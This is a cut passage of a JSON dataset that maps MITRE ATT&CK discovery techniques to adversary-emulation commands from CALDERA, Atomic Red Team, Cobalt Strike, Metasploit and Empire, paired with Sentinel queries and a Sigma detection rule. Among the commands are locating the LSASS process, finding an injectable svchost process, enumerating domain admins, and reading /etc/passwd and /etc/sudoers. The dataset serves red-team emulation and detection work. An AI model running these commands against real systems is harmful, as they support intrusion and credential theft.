};\n$valid | ConvertTo-Json\n", + "source": "data/abilities/discovery/0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml", + "name": "Get process info for LSASS" + }, + { + "command": "ps\n", + "source": "data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml", + "name": "Display information about current system processes" + }, + { + "command": "get-process\n", + "source": "data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml", + "name": "Display information about current system processes" + }, + { + "command": "ps aux | grep #{host.user.name}\n", + "source": "data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml", + "name": "Get process info for processes running as a user" + }, + { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select 
processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n", + "source": "data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml", + "name": "Get process info for processes running as a user" + }, + { + "command": "get-process >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "source": "data/abilities/discovery/4d9b079c-9ede-4116-8b14-72ad3a5533af.yml", + "name": "Capture running processes via PowerShell" + }, + { + "command": "Get-Process", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "tasklist", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "ps aux", + "source": "data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml", + "name": "Identify system processes" + }, + { + "command": "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n", + "source": "data/abilities/discovery/8adf02e8-6e71-4244-886c-98c402857404.yml", + "name": "Capture running processes and their loaded DLLs" + }, + { + "command": "powershell/situational_awareness/host/paranoia", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/process_hunter", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1057", + "Built-in Windows Command": "tasklist /v [/svc]\nnet start\nqprocess *", + "Cobalt Strike": "ps\nshell tasklist /v [/svc]\nshell net start", + "Metasploit": "ps\npost/windows/gather/enum_services", + "Description": "Display list of currently running processes and services on the system" + }, 
+ { + "attack_technique": "T1057", + "display_name": "Process Discovery", + "atomic_tests": [ + { + "name": "Process Discovery - ps", + "auto_generated_guid": "4ff64f0b-aaf2-4866-b39d-38d9791407cc", + "description": "Utilize ps to identify processes.\n\nUpon successful execution, sh will execute ps and output to /tmp/loot.txt.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "path of output file", + "type": "path", + "default": "/tmp/loot.txt" + } + }, + "executor": { + "command": "ps >> #{output_file}\nps aux >> #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Process Discovery - tasklist", + "auto_generated_guid": "c5806a4f-62b8-4900-980b-c7ec004e9908", + "description": "Utilize tasklist to identify processes.\n\nUpon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "tasklist\n", + "name": "command_prompt" + } + }, + { + "name": "Process Discovery - Get-Process", + "auto_generated_guid": "3b3809b6-a54b-4f5b-8aff-cb51f2e97b34", + "description": "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-Process\n", + "name": "powershell" + } + }, + { + "name": "Process Discovery - get-wmiObject", + "auto_generated_guid": "b51239b4-0129-474f-a2b4-70f855b9f2c2", + "description": "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. 
\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-wmiObject -class Win32_Process\n", + "name": "powershell" + } + }, + { + "name": "Process Discovery - wmic process", + "auto_generated_guid": "640cbf6d-659b-498b-ba53-f6dd1a1cc02c", + "description": "Utilize windows management instrumentation to identify processes.\n\nUpon successful execution, WMIC will execute process to list processes. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic process get /format:list\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "cc191baa-7472-4386-a2f4-42f203f1acfd", + "name": "SysInternals PSTool Process Discovery", + "description": "Process discovery via SysInternals pstool", + "tactic": "collection", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n" + } + } + } + }, + { + "id": "0093c0e0-68b6-4cab-b0d4-2b40b3c78f71", + "name": "enumerate VMs", + "description": "Enumerate running virtual machines on hypervisor", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "acrnctl list\n", + "parsers": { + "plugins.stockpile.app.parsers.acrn": [ + { + "source": "hypervisor.vm.name" + } + ] + } + } + } + } + }, + { + "id": "05cda6f6-2b1b-462e-bff1-845af94343f7", + "name": "Discover injectable process", + "description": "Discovers 
processes that the current user has the ability to access and selects an injectable one", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "host.process.id", + "custom_parser_vals": { + "json_key": "Id", + "json_type": "int" + } + } + ] + } + } + } + } + }, + { + "id": "0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7", + "name": "Find LSASS", + "description": "Get process info for LSASS", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "host.process.id", + "custom_parser_vals": { + "json_key": "Id", + "json_type": "int" + } + } + ] + } + }, + "cmd": { + "build_target": "GetLsass.exe", + "language": "csharp", + "code": "using System;\nusing System.Diagnostics;\nusing System.ComponentModel;\n\nnamespace ProcessDump\n{\n class MyProcess\n {\n void GrabLsassProcess()\n {\n Process[] allProc = Process.GetProcessesByName(\"lsass\");\n foreach(Process proc in allProc){\n Console.WriteLine(\"Process: {0} -> PID: {1}\", proc.ProcessName, proc.Id);\n }\n }\n static void Main(string[] args)\n {\n MyProcess myProc = new MyProcess();\n myProc.GrabLsassProcess();\n }\n }\n}\n" + } + } + } + }, + { + "id": "335cea7b-bec0-48c6-adfb-6066070f5f68", + "name": "View Processes", + "description": 
"Display information about current system processes", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ps\n" + } + }, + "linux": { + "sh": { + "command": "ps\n" + } + }, + "windows": { + "psh": { + "command": "get-process\n" + } + } + } + }, + { + "id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a", + "name": "Find user processes", + "description": "Get process info for processes running as a user", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ps aux | grep #{host.user.name}\n" + } + }, + "linux": { + "sh": { + "command": "ps aux | grep #{host.user.name}\n" + } + }, + "windows": { + "psh": { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "4d9b079c-9ede-4116-8b14-72ad3a5533af", + "name": "PowerShell Process Enumeration", + "description": "Capture running processes via PowerShell", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "get-process >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n" + } + } + } + }, + { + "id": "5a39d7ed-45c9-4a79-b581-e5fb99e24f65", + "name": "System processes", + "description": "Identify system processes", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-Process" + }, + "cmd": { + "command": "tasklist" + }, + "donut_amd64": { 
+ "build_target": "ProcessDump.donut", + "language": "csharp", + "code": "using System;\nusing System.Diagnostics;\nusing System.ComponentModel;\n\nnamespace ProcessDump\n{\n class MyProcess\n {\n void GrabAllProcesses()\n {\n Process[] allProc = Process.GetProcesses();\n foreach(Process proc in allProc){\n Console.WriteLine(\"Process: {0} -> PID: {1}\", proc.ProcessName, proc.Id);\n }\n }\n static void Main(string[] args)\n {\n MyProcess myProc = new MyProcess();\n myProc.GrabAllProcesses();\n }\n }\n}\n" + } + }, + "darwin": { + "sh": { + "command": "ps aux" + } + }, + "linux": { + "sh": { + "command": "ps aux" + } + } + } + }, + { + "id": "8adf02e8-6e71-4244-886c-98c402857404", + "name": "tasklist Process Enumeration", + "description": "Capture running processes and their loaded DLLs", + "tactic": "discovery", + "technique": { + "attack_id": "T1057", + "name": "Process Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/paranoia", + "ATT&CK Technique #1": "T1057", + "ATT&CK Technique #2": "", + "Technique": "Process Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/paranoia\": [\"T1057\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/process_hunter", + "ATT&CK Technique #1": "T1057", + "ATT&CK Technique #2": "", + "Technique": "Process Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/process_hunter\": [\"T1057\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"tasklist.exe\"or process_command_line contains \"Get-Process\"", + "name": "Process Discovery" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 
", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + 
"definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + 
"https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + 
[ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1069", + "command_list": [ + "net localgroup \"Administrators\"", + "shell net localgroup \"Administrators\"", + "post/windows/gather/local_admin_search_enum", + "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "net group [\"Domain Admins\"] /domain", + "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "powershell/situational_awareness/host/get_pathacl", + "powershell/situational_awareness/network/powerview/get_object_acl", + "powershell/situational_awareness/network/powerview/map_domain_trust", + "powershell/situational_awareness/host/get_uaclevel" + ], + "commands": [ + { + "command": "net localgroup \"Administrators\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net localgroup \"Administrators\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/local_admin_search_enum", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group [\"Domain Admins\"] /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": 
"powershell/situational_awareness/host/get_pathacl", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_object_acl", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/map_domain_trust", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/get_uaclevel", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1069", + "Built-in Windows Command": "net localgroup \"Administrators\"", + "Cobalt Strike": "shell net localgroup \"Administrators\"", + "Metasploit": "post/windows/gather/local_admin_search_enum", + "Description": "Display the list of local administrator accounts on the workstation " + }, + { + "Category": "T1069", + "Built-in Windows Command": "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "Cobalt Strike": "net group [\"Domain Admins\"] /domain", + "Metasploit": "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "Description": "Display the list of domain administrator accounts" + }, + { + "Empire Module": "powershell/situational_awareness/host/get_pathacl", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_pathacl\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_object_acl", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups 
Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_object_acl\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/map_domain_trust", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/map_domain_trust\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/get_uaclevel", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_uaclevel\": [\"T1069\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where process_path contains \"net\"and (file_directory contains \"user\"or file_directory contains \"group\"or file_directory contains \"localgroup\")", + "name": "Permission Groups Discovery" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"net.exe\"and (process_command_line contains \"*net* user*\"or process_command_line contains \"*net* group*\"or process_command_line contains \"*net* localgroup*\"or process_command_line contains \"*get-localgroup*\"or process_command_line contains \"*get-ADPrinicipalGroupMembership*\")", + "name": "Permission Groups Discovery Process" + } + ], + "possible_detections": [ + { + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "experimental", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "references": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html" + ], + "author": "Florian Roth (rule), Jack Croock (method)", + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1069", + 
"attack.s0039" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The volume of Event ID 4661 is high on Domain Controllers and therefore \"Audit SAM\" and \"Audit Kernel Object\" advanced audit policy settings are not configured in the recommendations for server systems" + }, + "detection": { + "selection": [ + { + "EventID": 4661, + "ObjectType": "SAM_USER", + "ObjectName": "S-1-5-21-*-500", + "AccessMask": "0x2d" + }, + { + "EventID": 4661, + "ObjectType": "SAM_GROUP", + "ObjectName": "S-1-5-21-*-512", + "AccessMask": "0x2d" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], 
+ "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group enumeration", + "description": "A group was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + 
"collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group metadata", + "description": "Data and information that describe a group and activity around it such as group permissions.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "group" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + 
] + }, + { + "technique_id": "T1087", + "command_list": [ + "net user [username] [/domain]", + "shell net user [username] [/domain]", + "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Net.exe localgroup \"administrators\"", + "Net.exe group \"domain admins\" /domain", + "Net.exe user * /domain", + "wmic.exe useraccount get /ALL", + "wmic.exe useraccount list", + "wmic.exe qfe get description,installedOn /format:csv", + "wmic.exe process get caption,executablepath,commandline", + "wmic.exe service get name,displayname,pathname,startmode", + "wmic.exe share list", + "wmic.exe /node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "wmic.exe get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "nltest.exe", + "powershell/management/get_domain_sid", + "powershell/management/sid_to_user", + "powershell/management/user_to_sid", + "powershell/situational_awareness/network/get_spn", + "powershell/situational_awareness/network/powerview/find_foreign_group", + 
"powershell/situational_awareness/network/powerview/find_foreign_user", + "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "powershell/situational_awareness/network/powerview/find_gpo_location", + "powershell/situational_awareness/network/powerview/find_localadmin_access", + "powershell/situational_awareness/network/powerview/find_managed_security_group", + "powershell/situational_awareness/network/powerview/get_gpo_computer", + "powershell/situational_awareness/network/powerview/get_group", + "powershell/situational_awareness/network/powerview/get_group_member", + "powershell/situational_awareness/network/powerview/get_localgroup", + "powershell/situational_awareness/network/powerview/get_loggedon", + "powershell/situational_awareness/network/powerview/get_ou", + "powershell/situational_awareness/network/powerview/get_user", + "powershell/situational_awareness/network/powerview/user_hunter", + "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "python/situational_awareness/network/active_directory/dscl_get_groups", + "python/situational_awareness/network/active_directory/dscl_get_users", + "python/situational_awareness/network/active_directory/get_groupmembers", + "python/situational_awareness/network/active_directory/get_groupmemberships", + "python/situational_awareness/network/active_directory/get_groups", + "python/situational_awareness/network/active_directory/get_ous", + "python/situational_awareness/network/active_directory/get_userinformation", + "python/situational_awareness/network/active_directory/get_users", + "Atomic Test #1 - Enumerate all accounts", + "cat /etc/passwd > #{output_file}", + "Atomic Test #2 - View sudoers access", + "cat /etc/sudoers > #{output_file}", + "Atomic Test #3 - View accounts with UID 0", + "username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username", + "lsof $USER", + "Atomic Test #4 - Show if a user account has ever logger in remotely", + "lastlog > 
